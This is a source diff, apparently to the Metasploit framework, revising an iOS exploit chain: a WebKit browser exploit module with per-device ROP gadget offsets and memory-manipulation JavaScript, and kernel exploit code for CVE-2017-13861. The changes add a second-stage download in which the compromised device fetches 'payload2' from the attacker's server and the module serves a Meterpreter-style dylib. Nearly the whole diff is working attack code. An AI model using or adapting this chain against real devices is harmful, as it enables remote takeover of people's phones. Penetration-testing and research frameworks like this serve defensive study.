diff --git a/external/source/exploits/CVE-2017-13861/kernel_utils.m b/external/source/exploits/CVE-2017-13861/kernel_utils.m
index c919f1aeb4..d7b1a65154 100644
--- a/external/source/exploits/CVE-2017-13861/kernel_utils.m
+++ b/external/source/exploits/CVE-2017-13861/kernel_utils.m
@@ -119,9 +119,7 @@ void Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length) {
 
 uint64_t proc_of_pid(pid_t pid) {
     uint64_t allproc = Find_allproc();
-    LOG("allproc %p", (void*)allproc);
     uint64_t proc = KernelRead_64bits(allproc), pd;
-    LOG("proc %p", (void*)proc);
 
     while (proc) { //iterate over all processes till we find the one we're looking for
         pd = KernelRead_32bits(proc + 0x10);
diff --git a/external/source/exploits/CVE-2017-13861/loader.c b/external/source/exploits/CVE-2017-13861/loader.c
index 1ec9547078..3b56a050f8 100644
--- a/external/source/exploits/CVE-2017-13861/loader.c
+++ b/external/source/exploits/CVE-2017-13861/loader.c
@@ -85,10 +85,6 @@ void init(void* dlopen_addr, void* dlsym_addr, void* jitwrite_addr, uint64_t sta
   debug_print("buffer:%p", (void*)payloadBuffer);
   debug_print("nbuffer:%p", (void*)*(uint64_t*)payloadBuffer);
   debug_print("start:%p", (void*)startOfFixMem);
-
-  /*void* libjsc = dlopen_func("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_NOW);*/
-  /*debug_print("jit %p", libjsc);*/
-
 #endif
 
   load((void*)payloadBuffer, (t_dlsym)dlsym_func, jitwrite_addr, (void*)startOfFixMem, (void*)endOfFixMem);
@@ -114,17 +110,6 @@ void performJITMemcpy(t_dlsym _dlsym, void* jitwrite, void* startOfFixMem, void*
     off_t offset = (off_t)((uintptr_t)dst - (uintptr_t)startOfFixMem);
     jitWriteSeparateHeapsFunction(offset, src, size);
 
-    /*uint64_t* stack_check_guard = _dlsym(RTLD_DEFAULT, "__stack_chk_guard");*/
-    /*char* gadget = _dlsym(RTLD_DEFAULT, "_ZN3JSC10LinkBuffer8linkCodeERNS_14MacroAssemblerEPvNS_20JITCompilationEffortE");*/
-
-    /*// jitcode.s has gadget code*/
-    /*const char* pattern = "\x93\x21\x98\xD2\xF3\xFF\xBF\xF2\xF3\x01\xC0\xF2\x69\x02\x40\x39";*/
-    /*int pattern_length = 16;*/
-    /*while (_memcmp(gadget, pattern, pattern_length))*/
-        /*gadget++;*/
-
-    /*jitcopy(gadget, stack_check_guard, dst, src, size);*/
-
     ASSERT(!_memcmp(dst, src, size));
 }
 
diff --git a/external/source/exploits/CVE-2017-13861/payload.m b/external/source/exploits/CVE-2017-13861/payload.m
index 462f5b4486..bf27fa9f5b 100644
--- a/external/source/exploits/CVE-2017-13861/payload.m
+++ b/external/source/exploits/CVE-2017-13861/payload.m
@@ -31,8 +31,7 @@
 
 #define SLOG(msg, ...) \
   do { \
-    NSLog(@"GREPME" msg "\n", __VA_ARGS__); \
-    if (getuid() == 123) { \
+    if (getuid() == 0) { \
       FILE* logfile = fopen("/var/mobile/log.txt", "a");\
       fprintf(logfile,msg, __VA_ARGS__); \
       fclose(logfile); \
@@ -53,10 +52,15 @@ int download_payload(char* file_path, const char* config_placeholder)
   unlink(file_path);
   SLOG("%s", "Downloading payload\n");
 
+  const char* payload_url = "payload";
+  if (kCFCoreFoundationVersionNumber >= 1443.00) {
+    payload_url = "payload2";
+  }
   // Load the payload from server
   int sockfd = 0;
   struct sockaddr_in serv_addr;
-  const char *getpayload = "GET /payload HTTP/1.1\r\n\r\n";
+  char getpayload[100];
+  snprintf(getpayload, sizeof(getpayload), "GET /%s HTTP/1.1\r\n\r\n", payload_url);
   const int chunk_size = 4096;
   char* payload_buffer = malloc(chunk_size);
   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
diff --git a/external/source/exploits/CVE-2017-13861/trustcache.m b/external/source/exploits/CVE-2017-13861/trustcache.m
index 68d5145482..a4ff3b63ce 100644
--- a/external/source/exploits/CVE-2017-13861/trustcache.m
+++ b/external/source/exploits/CVE-2017-13861/trustcache.m
@@ -10,7 +10,9 @@
 #include "sha256.h"
 
 #import <Foundation/Foundation.h>
-#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+
+//#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+#define LOG(str, args...)
 
 struct trust_mem {
     uint64_t next; //struct trust_mem *next;
diff --git a/modules/exploits/apple_ios/browser/webkit_createthis.rb b/modules/exploits/apple_ios/browser/webkit_createthis.rb
index a744aec99c..a01e080ddd 100644
--- a/modules/exploits/apple_ios/browser/webkit_createthis.rb
+++ b/modules/exploits/apple_ios/browser/webkit_createthis.rb
@@ -28,9 +28,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     => [
           ['CVE', '2018-4233'],
+          ['CVE', '2017-13861'],
           ['URL', 'https://github.com/saelo/cve-2018-4233'],
           ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],
-          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1564'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],
           ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],
         ],
       'Arch'           => ARCH_AARCH64,
@@ -73,6 +74,12 @@ class MetasploitModule < Msf::Exploit::Remote
       send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
       print_good("Sent payload")
       return
+    elsif request.uri =~ %r{/payload2$*}
+      dylib_path = ::File.join Msf::Config.data_directory, 'mettle', 'aarch64-iphone-darwin', 'bin', 'mettle2.dylib'
+      payload_data = ::File.binread dylib_path
+      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
+      print_good("Sent payload")
+      return
     end
 
     user_agent = request['User-Agent']
@@ -458,14 +465,10 @@ function pwn() {
         "__platform_memmove" : 0x1806ffe00, "_usleep" : 0x18056011c, "_dlopen" : 0x18052dd10, "_dlsym" : 0x18052ddd8, "_mach_task_self_" : 0x1a586e3bc,
         "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1a457c438, },
 
-        /*
         // iPhone 6S 11.0.3
-        425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc, 
+        425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc,
         "__platform_memmove" : 0x1807bdab0, "_usleep" : 0x1805cee70, "_dlopen" : 0x180587460, "_dlsym" : 0x180587574, "_mach_task_self_" : 0x1b1562fac,
-        "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8,
-        "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00,
-        "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
-        */
+        "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8, "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00, "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
     }
 
     var offsets = offset_cache[uuid];
@@ -514,7 +517,7 @@ function pwn() {
             // mov x4, x20 ; blr x8
             "movx4":     [ [ 0xaa1403e4, 0xd63f0100 ] ],
         }
-        opcode_libs = [
+        var opcode_libs = [
             "/usr/lib/PN548.dylib",     // dispatch, stackloader
             "/usr/lib/libc++.1.dylib",  // ldrx8, regloader, movx4, stackloader
         ];
@@ -540,7 +543,6 @@ function pwn() {
         };
 
         var opcode_libs = [ "/usr/lib/libLLVM.dylib" ];
-
         '}
 
         var imgs  = Add(hdr, memory.u32(Add(hdr, 0x18)));
@@ -718,14 +720,16 @@ function pwn() {
     var movx4               = offsets["movx4"]; // might be null
 
     var mach_task_self_     = new Int64(memory.readInt64(task_self).lo());
-    var memPoolStart        = memory.readInt64(startOfFixedMem);
     var memPoolEnd          = memory.readInt64(endOfFixedMem);
 
-    var jitWriteSeparateHeaps;
-    if (syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
-        jitWriteSeparateHeaps = memory.readInt64(syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
-    } else {
-        jitWriteSeparateHeaps = Int64.Zero;
+    var memPoolStart        = Int64.Zero;
+    if (startOfFixedMem) {
+        memPoolStart = memory.readInt64(startOfFixedMem);
+    }
+
+    var jitWriteSeparateHeaps = Int64.Zero;
+    if (offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
+        jitWriteSeparateHeaps = memory.readInt64(offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
     }
 
     var shsz = new Int64("0x100000");